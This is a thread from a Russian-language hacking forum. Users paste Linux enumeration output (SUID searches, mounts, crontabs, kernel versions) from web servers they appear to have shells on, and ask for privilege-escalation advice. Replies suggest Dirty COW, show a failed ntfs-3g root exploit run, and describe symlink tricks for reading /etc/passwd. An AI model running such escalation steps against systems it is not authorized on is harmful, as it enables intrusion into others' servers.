lrwxrwxrwx 1 root root 15 2011-12-29 11:24:57.000000000 +0100 libbz2.so.1.
0 -> libbz2.so.1.0.4
-rw-r--r-- 1 root root 66276 2011-12-12 23:40:54.000000000 +0100 libbz2.so.1.
0.4
-rwxr-xr-x 1 root root 1294572 2012-12-15 20:01:15.000000000 +0100 libc-2.7.so
lrwxrwxrwx 1 root root 11 2012-12-17 17:33:13.000000000 +0100 libc.so.6 ->
libc-2.7.so
lrwxrwxrwx 1 root root 14 2010-03-02 18:37:33.000000000 +0100 libcap.so.1
-> libcap.so.1.10
-rw-r--r-- 1 root root 10316 2007-07-31 21:20:19.000000000 +0200 libcap.so.1.
10
lrwxrwxrwx 1 root root 17 2010-03-02 18:37:33.000000000 +0100 libcfont.so.
0 -> libcfont.so.0.0.0
-rw-r--r-- 1 root root 11512 2008-02-06 23:49:54.000000000 +0100 libcfont.so.
0.0.0
-rw-r--r-- 1 root root 181724 2012-12-15 20:01:15.000000000 +0100 libcidn-2.7.
so
lrwxrwxrwx 1 root root 14 2012-12-17 17:33:13.000000000 +0100 libcidn.so.1
-> libcidn-2.7.so
lrwxrwxrwx 1 root root 17 2010-03-02 18:37:32.000000000 +0100 libcom_err.s
o.2 -> libcom_err.so.2.1
-rw-r--r-- 1 root root 7444 2008-03-27 18:25:48.000000000 +0100 libcom_err.s
o.2.1
lrwxrwxrwx 1 root root 19 2010-03-02 18:37:33.000000000 +0100 libconsole.s
o.0 -> libconsole.so.0.0.0
-rw-r--r-- 1 root root 73312 2008-02-06 23:49:54.000000000 +0100 libconsole.s
o.0.0.0
-rw-r--r-- 1 root root 38300 2012-12-15 20:01:15.000000000 +0100 libcrypt-2.7
.so
lrwxrwxrwx 1 root root 15 2012-12-17 17:33:13.000000000 +0100 libcrypt.so.
1 -> libcrypt-2.7.so
lrwxrwxrwx 1 root root 19 2010-03-02 18:37:32.000000000 +0100 libctutils.s
o.0 -> libctutils.so.0.0.0
-rw-r--r-- 1 root root 17424 2008-02-06 23:49:54.000000000 +0100 libctutils.s
o.0.0.0
-rw-r--r-- 1 root root 85108 2007-12-12 20:25:16.000000000 +0100 libdevmapper
.so.1.02.1
-rw-r--r-- 1 root root 9684 2012-12-15 20:01:15.000000000 +0100 libdl-2.7.so

lrwxrwxrwx 1 root root 12 2012-12-17 17:33:13.000000000 +0100 libdl.so.2 -
> libdl-2.7.so
lrwxrwxrwx 1 root root 13 2010-03-02 18:37:32.000000000 +0100 libe2p.so.2
-> libe2p.so.2.3
-rw-r--r-- 1 root root 20052 2008-03-27 18:25:48.000000000 +0100 libe2p.so.2.
3
lrwxrwxrwx 1 root root 16 2010-03-02 18:37:33.000000000 +0100 libext2fs.so
.2 -> libext2fs.so.2.4
-rw-r--r-- 1 root root 142792 2008-03-27 18:25:48.000000000 +0100 libext2fs.so
.2.4
lrwxrwxrwx 1 root root 16 2011-03-03 13:04:15.000000000 +0100 libfuse.so.2
-> libfuse.so.2.7.2
-rw-r--r-- 1 root root 102816 2011-02-11 21:45:09.000000000 +0100 libfuse.so.2
.7.2
-rw-r--r-- 1 root root 42700 2009-02-19 11:39:17.000000000 +0100 libgcc_s.so.
1
lrwxrwxrwx 1 root root 19 2010-03-02 18:37:32.000000000 +0100 libgcrypt.so
.11 -> libgcrypt.so.11.2.3
-rw-r--r-- 1 root root 310956 2007-12-07 12:34:06.000000000 +0100 libgcrypt.so
.11.2.3
lrwxrwxrwx 1 root root 21 2010-03-02 18:37:33.000000000 +0100 libgpg-error
.so.0 -> libgpg-error.so.0.3.0
-rw-r--r-- 1 root root 11468 2007-11-16 01:56:41.000000000 +0100 libgpg-error
.so.0.3.0
lrwxrwxrwx 1 root root 17 2010-03-02 18:37:33.000000000 +0100 libhistory.s
o.5 -> libhistory.so.5.2
-rw-r--r-- 1 root root 27188 2007-10-02 16:35:06.000000000 +0200 libhistory.s
o.5.2
-rw-r--r-- 1 root root 27444 2007-12-21 15:36:58.000000000 +0100 libiw.so.29
-rw-r--r-- 1 root root 5644 2007-10-24 04:37:31.000000000 +0200 libkeyutils-
1.2.so
lrwxrwxrwx 1 root root 18 2010-03-02 18:37:32.000000000 +0100 libkeyutils.
so.1 -> libkeyutils-1.2.so
-rw-r--r-- 1 root root 145232 2012-12-15 20:01:15.000000000 +0100 libm-2.7.so
lrwxrwxrwx 1 root root 11 2012-12-17 17:33:13.000000000 +0100 libm.so.6 ->
libm-2.7.so
-rw-r--r-- 1 root root 13696 2012-12-15 20:01:15.000000000 +0100 libmemusage.
so
lrwxrwxrwx 1 root root 17 2010-03-02 18:37:32.000000000 +0100 libncurses.s
o.5 -> libncurses.so.5.6
-rw-r--r-- 1 root root 190584 2008-02-24 00:38:14.000000000 +0100 libncurses.s
o.5.6
lrwxrwxrwx 1 root root 18 2010-03-02 18:37:32.000000000 +0100 libncursesw.
so.5 -> libncursesw.so.5.6
-rw-r--r-- 1 root root 236568 2008-02-24 00:38:14.000000000 +0100 libncursesw.
so.5.6
-rw-r--r-- 1 root root 79612 2012-12-15 20:01:15.000000000 +0100 libnsl-2.7.s
o
lrwxrwxrwx 1 root root 13 2012-12-17 17:33:13.000000000 +0100 libnsl.so.1
-> libnsl-2.7.so
-rw-r--r-- 1 root root 26340 2012-12-15 20:01:15.000000000 +0100 libnss_compa
t-2.7.so
lrwxrwxrwx 1 root root 20 2012-12-17 17:33:13.000000000 +0100 libnss_compa
t.so.2 -> libnss_compat-2.7.so
-rw-r--r-- 1 root root 17884 2012-12-15 20:01:15.000000000 +0100 libnss_dns-2
.7.so
lrwxrwxrwx 1 root root 17 2012-12-17 17:33:13.000000000 +0100 libnss_dns.s
o.2 -> libnss_dns-2.7.so
-rw-r--r-- 1 root root 38412 2012-12-15 20:01:15.000000000 +0100 libnss_files
-2.7.so
lrwxrwxrwx 1 root root 19 2012-12-17 17:33:13.000000000 +0100 libnss_files
.so.2 -> libnss_files-2.7.so
-rw-r--r-- 1 root root 17900 2012-12-15 20:01:15.000000000 +0100 libnss_hesio
d-2.7.so
lrwxrwxrwx 1 root root 20 2012-12-17 17:33:13.000000000 +0100 libnss_hesio
d.so.2 -> libnss_hesiod-2.7.so
-rw-r--r-- 1 root root 34352 2012-12-15 20:01:15.000000000 +0100 libnss_nis-2
.7.so
lrwxrwxrwx 1 root root 17 2012-12-17 17:33:13.000000000 +0100 libnss_nis.s
o.2 -> libnss_nis-2.7.so
-rw-r--r-- 1 root root 42508 2012-12-15 20:01:15.000000000 +0100 libnss_nispl
us-2.7.so
lrwxrwxrwx 1 root root 21 2012-12-17 17:33:13.000000000 +0100 libnss_nispl
us.so.2 -> libnss_nisplus-2.7.so
lrwxrwxrwx 1 root root 20 2010-03-02 18:37:32.000000000 +0100 libntfs-3g.s
o.23 -> libntfs-3g.so.23.0.0
-rw-r--r-- 1 root root 182804 2008-07-10 12:19:22.000000000 +0200 libntfs-3g.s
o.23.0.0
lrwxrwxrwx 1 root root 16 2011-11-10 22:29:24.000000000 +0100 libpam.so.0
-> libpam.so.0.81.6
-rw-r--r-- 1 root root 37956 2011-10-18 17:37:36.000000000 +0200 libpam.so.0.
81.6
lrwxrwxrwx 1 root root 21 2011-11-10 22:29:24.000000000 +0100 libpam_misc.
so.0 -> libpam_misc.so.0.81.2
-rw-r--r-- 1 root root 8520 2011-10-18 17:37:36.000000000 +0200 libpam_misc.
so.0.81.2
lrwxrwxrwx 1 root root 17 2011-11-10 22:29:24.000000000 +0100 libpamc.so.0
-> libpamc.so.0.81.0
-rw-r--r-- 1 root root 9028 2011-10-18 17:37:36.000000000 +0200 libpamc.so.0
.81.0
lrwxrwxrwx 1 root root 22 2010-03-02 18:37:33.000000000 +0100 libparted-1.
7.so.1 -> libparted-1.7.so.1.0.0
-rw-r--r-- 1 root root 388784 2009-06-05 11:42:39.000000000 +0200 libparted-1.
7.so.1.0.0
-rw-r--r-- 1 root root 5444 2012-12-15 20:01:15.000000000 +0100 libpcprofile
.so
lrwxrwxrwx 1 root root 16 2010-03-02 18:37:33.000000000 +0100 libpopt.so.0
-> libpopt.so.0.0.0
-rw-r--r-- 1 root root 27144 2007-03-07 22:46:19.000000000 +0100 libpopt.so.0
.0.0
-rw-r--r-- 1 root root 49096 2008-07-10 11:28:34.000000000 +0200 libproc-3.2.
7.so
-rwxr-xr-x 1 root root 112174 2012-12-15 20:01:20.000000000 +0100 libpthread-2
.7.so
lrwxrwxrwx 1 root root 17 2012-12-17 17:33:13.000000000 +0100 libpthread.s
o.0 -> libpthread-2.7.so
lrwxrwxrwx 1 root root 18 2010-03-02 18:37:33.000000000 +0100 libreadline.
so.5 -> libreadline.so.5.2
-rw-r--r-- 1 root root 196560 2007-10-02 16:35:06.000000000 +0200 libreadline.
so.5.2
-rw-r--r-- 1 root root 59216 2012-12-15 20:01:15.000000000 +0100 libresolv-2.
7.so
lrwxrwxrwx 1 root root 16 2012-12-17 17:33:13.000000000 +0100 libresolv.so
.2 -> libresolv-2.7.so
-rw-r--r-- 1 root root 30624 2012-12-15 20:01:15.000000000 +0100 librt-2.7.so

lrwxrwxrwx 1 root root 12 2012-12-17 17:33:13.000000000 +0100 librt.so.1 -
> librt-2.7.so
-rw-r--r-- 1 root root 95948 2008-02-29 23:29:19.000000000 +0100 libselinux.s
o.1
-rw-r--r-- 1 root root 207284 2008-03-01 06:21:06.000000000 +0100 libsepol.so.
1
lrwxrwxrwx 1 root root 17 2010-03-02 18:37:32.000000000 +0100 libslang.so.
2 -> libslang.so.2.1.3
-rw-r--r-- 1 root root 686384 2007-11-28 14:54:47.000000000 +0100 libslang.so.
2.1.3
lrwxrwxrwx 1 root root 12 2010-03-02 18:37:33.000000000 +0100 libss.so.2 -
> libss.so.2.0
-rw-r--r-- 1 root root 18648 2008-03-27 18:25:48.000000000 +0100 libss.so.2.0

lrwxrwxrwx 1 root root 17 2010-03-02 18:37:33.000000000 +0100 libsysfs.so.
2 -> libsysfs.so.2.0.1
-rw-r--r-- 1 root root 37784 2008-04-01 19:03:20.000000000 +0200 libsysfs.so.
2.0.1
-rw-r--r-- 1 root root 26284 2012-12-15 20:01:15.000000000 +0100 libthread_db
-1.0.so
lrwxrwxrwx 1 root root 19 2012-12-17 17:33:13.000000000 +0100 libthread_db
.so.1 -> libthread_db-1.0.so
lrwxrwxrwx 1 root root 13 2010-03-02 18:37:32.000000000 +0100 libtic.so.5
-> libtic.so.5.6
-rw-r--r-- 1 root root 69952 2008-02-24 00:38:14.000000000 +0100 libtic.so.5.
6
lrwxrwxrwx 1 root root 14 2010-03-02 18:37:32.000000000 +0100 libticw.so.5
-> libticw.so.5.6
-rw-r--r-- 1 root root 69952 2008-02-24 00:38:14.000000000 +0100 libticw.so.5
.6
lrwxrwxrwx 1 root root 20 2011-03-03 13:04:15.000000000 +0100 libulockmgr.
so.1 -> libulockmgr.so.1.0.1
-rw-r--r-- 1 root root 7836 2011-02-11 21:45:09.000000000 +0100 libulockmgr.
so.1.0.1
lrwxrwxrwx 1 root root 19 2010-03-02 18:37:33.000000000 +0100 libusb-0.1.s
o.4 -> libusb-0.1.so.4.4.4
-rw-r--r-- 1 root root 29056 2007-11-23 10:47:27.000000000 +0100 libusb-0.1.s
o.4.4.4
-rw-r--r-- 1 root root 9696 2012-12-15 20:01:15.000000000 +0100 libutil-2.7.
so
lrwxrwxrwx 1 root root 14 2012-12-17 17:33:13.000000000 +0100 libutil.so.1
-> libutil-2.7.so
lrwxrwxrwx 1 root root 14 2010-03-02 18:37:33.000000000 +0100 libuuid.so.1
-> libuuid.so.1.2
-rw-r--r-- 1 root root 13188 2008-03-27 18:25:48.000000000 +0100 libuuid.so.1
.2
lrwxrwxrwx 1 root root 22 2010-03-02 18:37:32.000000000 +0100 libvolume_id
.so.0 -> libvolume_id.so.0.81.0
-rw-r--r-- 1 root root 27864 2009-04-14 23:45:06.000000000 +0200 libvolume_id
.so.0.81.0
lrwxrwxrwx 1 root root 16 2010-03-02 18:37:33.000000000 +0100 libwrap.so.0
-> libwrap.so.0.7.6
-rw-r--r-- 1 root root 31304 2007-07-30 10:19:43.000000000 +0200 libwrap.so.0
.7.6
drwxr-xr-x 2 root root 4096 2010-01-09 18:01:57.000000000 +0100 lsb
drwxr-xr-x 2 root root 4096 2008-10-06 14:51:29.000000000 +0200 modules
drwxr-xr-x 2 root root 4096 2011-11-10 22:29:15.000000000 +0100 security
drwxr-xr-x 15 root root 4096 2008-02-24 00:38:00.000000000 +0100 terminfo
drwxr-xr-x 3 root root 4096 2010-01-09 18:02:34.000000000 +0100 tls
drwxr-xr-x 3 root root 4096 2011-01-21 16:23:48.000000000 +0100 udev

mount

Code:
/dev/simfs on / type simfs (rw,relatime)
/dev/mapper/pve-web1home on /home type ext4 (rw,noatime,relatime,barrier=1,data=
ordered)
proc on /proc type proc (rw,relatime)
sysfs on /sys type sysfs (rw,relatime)
tmpfs on /var/run type tmpfs (rw,nosuid,nodev,noexec,relatime,mode=755)
tmpfs on /var/lock type tmpfs (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev/shm type tmpfs (rw,relatime)
devpts on /dev/pts type devpts (rw,relatime,gid=5,mode=620,ptmxmode=000)
tmpfs on /var/run type tmpfs (rw,nosuid,nodev,noexec,relatime,mode=755)
tmpfs on /var/lock type tmpfs (rw,nosuid,nodev,noexec,relatime)

cat /etc/issue

Code:
Ubuntu 8.04.4 LTS \n \l

cat /etc/crontab

Code:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
50 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/c
ron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/c
ron.weekly )
52 6 15 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/
cron.monthly )

cat /proc/version

Code:
Linux version 2.6.32-26-pve (root@lola) (gcc version 4.7.2 (Debian 4.7.2-5) ) #1
SMP Mon Oct 14 08:22:20 CEST 2013

cat /proc/sys/vm/mmap_min_addr

Code:
4096

ls -la /usr/bin/staprun

Code:
ls: cannot access /usr/bin/staprun: No such file or directory

find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null

Code:
-rwsr-xr-x 1 root root 9624 Dec 15 2012 /usr/lib/pt_chown
-rwsr-xr-- 1 root messagebus 228628 Oct 3 2012 /usr/lib/dbus-1.0/dbus-daemon-l
aunch-helper
-rwsr-xr-x 1 root root 4588 Aug 23 2008 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root www-data 10276 Mar 8 2013 /usr/lib/apache2/suexec
-rwsr-xr-x 1 root root 168340 Mar 8 2011 /usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 libuuid libuuid 12336 Mar 27 2008 /usr/sbin/uuidd
-rwsr-xr-x 2 root root 108068 Feb 27 2013 /usr/bin/sudoedit
-rwsr-xr-x 1 root root 46084 Mar 31 2008 /usr/bin/mtr
-rwsr-sr-x 1 root root 7460 Jun 25 2008 /usr/bin/X
-rwsr-xr-x 2 root root 108068 Feb 27 2013 /usr/bin/sudo
-rwsr-xr-x 1 root root 37360 Dec 8 2008 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 12296 Dec 10 2007 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 11048 Dec 10 2007 /usr/bin/arping
-rwsr-xr-x 1 root root 23952 Dec 8 2008 /usr/bin/chsh
-rwsr-xr-x 1 root root 28624 Dec 8 2008 /usr/bin/chfn
-rwsr-sr-x 1 daemon daemon 38464 Feb 20 2007 /usr/bin/at
-rwsr-xr-x 1 root root 19144 Dec 8 2008 /usr/bin/newgrp
-rwsr-xr-x 1 root root 29104 Dec 8 2008 /usr/bin/passwd

zifus

10.04.2017, 18:30

:."]
.:[melkiy]:. said:
↑ (https://antichat.live/posts/4070679/)
Парни, подскажите что можно попробовать.
uname -a

Code:
Linux web1 2.6.32-26-pve #1 SMP Mon Oct 14 08:22:20 CEST 2013 i686 GNU/Linux

Пробуй dirtyc0w

ACat

11.04.2017, 00:20

ACat

23.05.2017, 01:07

парни, поясните пожалуйста, как работает сплоит, и почему он у меня не работает?

http://0day.today/exploit/26893

Code:
/bin/bash ./d9.sh
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @
@ CVE-2017-0359, PoC by Kristian Erik Hermansen @
@ ntfs-3g local privilege escalation to root @
@ Credits to Google Project Zero @
@ Affects: Debian 9/8/7, Ubuntu, Gentoo, others @
@ Tested: Debian 9 (Stretch) @
@ Date: 2017-02-03 @
@ Link: https://goo.gl/A9I8Vq @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @
Gathering environment info ...
Creating kernel hijack directories ...
Forging symlinks ...
ln: failed to create symbolic link `/var/www/alfavito/modules/template/templates/lib/modules\r/2.6.32-openvz-042stab120.16-amd64\r\r': No such file or directory
ln: failed to create symbolic link `/var/www/alfavito/modules/template/templates/kernel/fs\r/fuse\r': No such file or directory
Pulling in deps ...
Building kernel module ...
./d9.sh: line 25: $'\r': command not found
./d9.sh: line 64: warning: here-document at line 26 delimited by end-of-file (wanted `EOF')

SooLFaa

31.05.2017, 20:38

ACat said:
↑ (https://antichat.live/posts/4088172/)
парни, поясните пожалуйста, как работает сплоит, и почему он у меня не работает?
http://0day.today/exploit/26893

Code:
/bin/bash ./d9.sh
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @
@ CVE-2017-0359, PoC by Kristian Erik Hermansen @
@ ntfs-3g local privilege escalation to root @
@ Credits to Google Project Zero @
@ Affects: Debian 9/8/7, Ubuntu, Gentoo, others @
@ Tested: Debian 9 (Stretch) @
@ Date: 2017-02-03 @
@ Link: https://goo.gl/A9I8Vq @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @
Gathering environment info ...
Creating kernel hijack directories ...
Forging symlinks ...
ln: failed to create symbolic link `/var/www/alfavito/modules/template/templates/lib/modules\r/2.6.32-openvz-042stab120.16-amd64\r\r': No such file or directory
ln: failed to create symbolic link `/var/www/alfavito/modules/template/templates/kernel/fs\r/fuse\r': No such file or directory
Pulling in deps ...
Building kernel module ...
./d9.sh: line 25: $'\r': command not found
./d9.sh: line 64: warning: here-document at line 26 delimited by end-of-file (wanted `EOF')

Судя по логу сплоит создает так называемые именованные ссылки (symlink). Это большая уязвимость в юникс системах, так как ссылка создана пользователем и сответственно есть права её читать. Помню был сценарий атаки когда с помощью rsync'a мы заливали ссылку и читали файлы конфига веб сервера и прочее. ln -s /etc/passwd /asd потом просто читаешь cat asd - таким образом часто байпассятся привелегии и есть возможность читать файлы за пределами допустимой диры. А ошибка простая, пытается создать ссылку на несуществующий файл.

madik

01.06.2017, 15:05

есть физический доступ к машине win10 пользователь юзер возможности вставить диск или флешку нету

ACat

02.06.2017, 17:16

SooLFaa said:
↑ (https://antichat.live/posts/4091511/)
Судя по логу сплоит создает так называемые именованные ссылки (symlink). Это большая уязвимость в юникс системах, так как ссылка создана пользователем и сответственно есть права её читать. Помню был сценарий атаки когда с помощью rsync'a мы заливали ссылку и читали файлы конфига веб сервера и прочее. ln -s /etc/passwd /asd потом просто читаешь cat asd - таким образом часто байпассятся привелегии и есть возможность читать файлы за пределами допустимой диры. А ошибка простая, пытается создать ссылку на несуществующий файл.

Сэр, а как проверить сервер на уязвимость последним векторам атак?

SooLFaa

02.06.2017, 17:35

ACat said:
↑ (https://antichat.live/posts/4092259/)
Сэр, а как проверить сервер на уязвимость последним векторам атак?

Для unix систем есть шикарный скрипт (http://www.securitysift.com/download/linuxprivchecker.py)

UPD: А так пробовать их все.

ACat

05.06.2017, 14:35

uname -a

Code:
Linux winetime.ellyt.com 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1+deb8u2 (2017-03-07) x86_64 GNU/Linux

sh-4.3$ ls -la /boot

Code:
total 20512
drwxr-xr-x 3 root root 4096 Jun 1 08:25 .
drwxr-xr-x 23 root root 4096 Jun 1 09:11 ..
-rw-r--r-- 1 root root 2681172 Mar 8 01:59 System.map-3.16.0-4-amd64
-rw-r--r-- 1 root root 157815 Mar 8 01:59 config-3.16.0-4-amd64
drwxr-xr-x 5 root root 4096 Apr 6 11:52 grub
-rw-r--r-- 1 root root 15017568 Jun 1 08:25 initrd.img-3.16.0-4-amd64
-rw-r--r-- 1 root root 3128784 Mar 8 01:58 vmlinuz-3.16.0-4-amd64

ls -la --full-time /lib

Code:
total 280
drwxr-xr-x 16 root root 4096 2017-06-01 08:24:38.147095248 +0300 .
drwxr-xr-x 23 root root 4096 2017-06-01 09:11:13.863704998 +0300 ..
lrwxrwxrwx 1 root root 21 2017-04-07 21:12:08.155124000 +0300 cpp -> /etc/alternatives/cpp
drwxr-xr-x 2 root root 4096 2017-04-06 11:11:32.822435000 +0300 discover
drwxr-xr-x 2 root root 4096 2017-04-06 11:08:06.370435000 +0300 ifupdown
drwxr-xr-x 2 root root 4096 2017-04-06 11:07:50.358435000 +0300 init
-rwxr-xr-x 1 root root 71416 2014-10-05 04:01:50.000000000 +0300 klibc-IpHGKKbZiB_yZ7GPagmQz2GwVAQ.so
lrwxrwxrwx 1 root root 17 2014-11-08 19:03:39.000000000 +0200 libip4tc.so.0 -> libip4tc.so.0.1.0
-rw-r--r-- 1 root root 31416 2014-11-08 19:03:41.000000000 +0200 libip4tc.so.0.1.0
lrwxrwxrwx 1 root root 17 2014-11-08 19:03:39.000000000 +0200 libip6tc.so.0 -> libip6tc.so.0.1.0
-rw-r--r-- 1 root root 31416 2014-11-08 19:03:41.000000000 +0200 libip6tc.so.0.1.0
lrwxrwxrwx 1 root root 15 2014-11-08 19:03:39.000000000 +0200 libipq.so.0 -> libipq.so.0.0.0
-rw-r--r-- 1 root root 10544 2014-11-08 19:03:41.000000000 +0200 libipq.so.0.0.0
lrwxrwxrwx 1 root root 16 2014-11-08 19:03:39.000000000 +0200 libiptc.so.0 -> libiptc.so.0.0.0
-rw-r--r-- 1 root root 5816 2014-11-08 19:03:41.000000000 +0200 libiptc.so.0.0.0
lrwxrwxrwx 1 root root 20 2014-11-08 19:03:39.000000000 +0200 libxtables.so.10 -> libxtables.so.10.0.0
-rw-r--r-- 1 root root 51896 2014-11-08 19:03:42.000000000 +0200 libxtables.so.10.0.0
drwxr-xr-x 3 root root 4096 2017-04-06 11:07:50.206435000 +0300 lsb
drwxr-xr-x 2 root root 4096 2017-04-06 11:08:07.734435000 +0300 modprobe.d
drwxr-xr-x 3 root root 4096 2017-04-06 11:08:31.846435000 +0300 modules
drwxr-xr-x 2 root root 4096 2017-06-01 08:24:38.227099822 +0300 modules-load.d
drwxr-xr-x 2 root root 4096 2017-04-06 11:07:50.270435000 +0300 startpar
drwxr-xr-x 8 root root 4096 2017-04-06 11:07:55.662435000 +0300 systemd
drwxr-xr-x 15 root root 4096 2017-04-06 11:07:27.242435000 +0300 terminfo
drwxr-xr-x 4 root root 4096 2017-04-06 11:08:00.966435000 +0300 udev
drwxr-xr-x 2 root root 4096 2017-04-22 18:39:02.116227245 +0300 ufw
drwxr-xr-x 4 root root 12288 2017-06-01 08:24:52.967942493 +0300 x86_64-linux-gnu
drwxr-xr-x 2 root root 4096 2017-04-06 11:08:07.490435000 +0300 xtables

ls -la --full-time /lib64

Code:
total 8
drwxr-xr-x 2 root root 4096 2017-04-06 11:07:37.814435000 +0300 .
drwxr-xr-x 23 root root 4096 2017-06-01 09:11:13.863704998 +0300 ..
lrwxrwxrwx 1 root root 32 2016-11-28 06:26:42.000000000 +0200 ld-linux-x86-64.so.2 -> /lib/x86_64-linux-gnu/ld-2.19.so

mount

Code:
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
udev on /dev type devtmpfs (rw,relatime,size=10240k,nr_inodes=255197,mode=755 )
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode =000)
tmpfs on /run type tmpfs (rw,nosuid,relatime,size=411712k,mode=755)
/dev/sda2 on / type ext4 (rw,relatime,errors=remount-ro,data=ordered,jqfmt=vfsv0,usrjquota=quota.user,g rpjquota=quota.group)
securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755)
cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,release_age nt=/lib/systemd/systemd-cgroups-agent,name=systemd)
pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=22,pgrp=1,timeout=300,minproto=5,m axproto=5,direct)
mqueue on /dev/mqueue type mqueue (rw,relatime)
debugfs on /sys/kernel/debug type debugfs (rw,relatime)
hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime)
fusectl on /sys/fs/fuse/connections type fusectl (rw,relatime)
/dev/sdb1 on /var type ext4 (rw,relatime,errors=remount-ro,data=ordered,jqfmt=vfsv0,usrjquota=quota.user,g rpjquota=quota.group)
/dev/sdc1 on /backup type ext4 (rw,relatime,errors=remount-ro,data=ordered,jqfmt=vfsv0,usrjquota=quota.user,g rpjquota=quota.group)
/dev/sdb1 on /var/www/clients/client2/web7/log type ext4 (rw,relatime,errors=remount-ro,data=ordered,jqfmt=vfsv0,usrjquota=quota.user,g rpjquota=quota.group)
rpc_pipefs on /run/rpc_pipefs type rpc_pipefs (rw,relatime)
/dev/sdb1 on /var/www/clients/client2/web6/log type ext4 (rw,relatime,errors=remount-ro,data=ordered,jqfmt=vfsv0,usrjquota=quota.user,g rpjquota=quota.group)
/dev/sdb1 on /var/www/clients/client2/web8/log type ext4 (rw,relatime,errors=remount-ro,data=ordered,jqfmt=vfsv0,usrjquota=quota.user,g rpjquota=quota.group)
binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,relatime)

df -h

Code:
Filesystem Size Used Avail Use% Mounted on
/dev/sda2 3.0G 1.8G 1.1G 62% /
udev 10M 0 10M 0% /dev
tmpfs 403M 41M 362M 11% /run
tmpfs 1006M 0 1006M 0% /dev/shm
tmpfs 5.0M 4.0K 5.0M 1% /run/lock
tmpfs 1006M 0 1006M 0% /sys/fs/cgroup
/dev/sdb1 99G 40G 54G 43% /var
/dev/sdc1 99G 359M 93G 1% /backup

Code:
Debian GNU/Linux 8 \n \l

cat /etc/crontab

Code:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

cat /proc/version

Code:
Linux version 3.16.0-4-amd64 (debian-kernel@lists.debian.org) (gcc version 4.8.4 (Debian 4.8.4-1) ) #1 SMP Debian 3.16.39-1+deb8u2 (2017-03-07)

cat /proc/sys/vm/mmap_min_addr

Code:
65536

pwd

Code:
/var/www/clients/client2/web8/web/modules/crm

ls -la /usr/bin/staprun

Code:
ls: cannot access /usr/bin/staprun: No such file or directory

sh-4.3$ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null

Code:
find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
-rwsr-xr-x 1 root root 90456 Aug 13 2014 /sbin/mount.nfs
-rwsr-xr-x 1 root root 23472 Apr 7 21:58 /usr/sbin/jk_chrootsh
-rwsr-xr-x 1 root root 13824 Apr 7 21:58 /usr/sbin/jk_procmailwrapper
-rwsr-xr-- 1 root www-data 18472 Feb 24 20:40 /usr/lib/apache2/suexec-pristine
-rwsr-xr-x 1 root root 10104 Mar 28 08:33 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 464904 Jul 22 2016 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 294512 Nov 22 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 39912 Feb 24 10:09 /usr/bin/newgrp
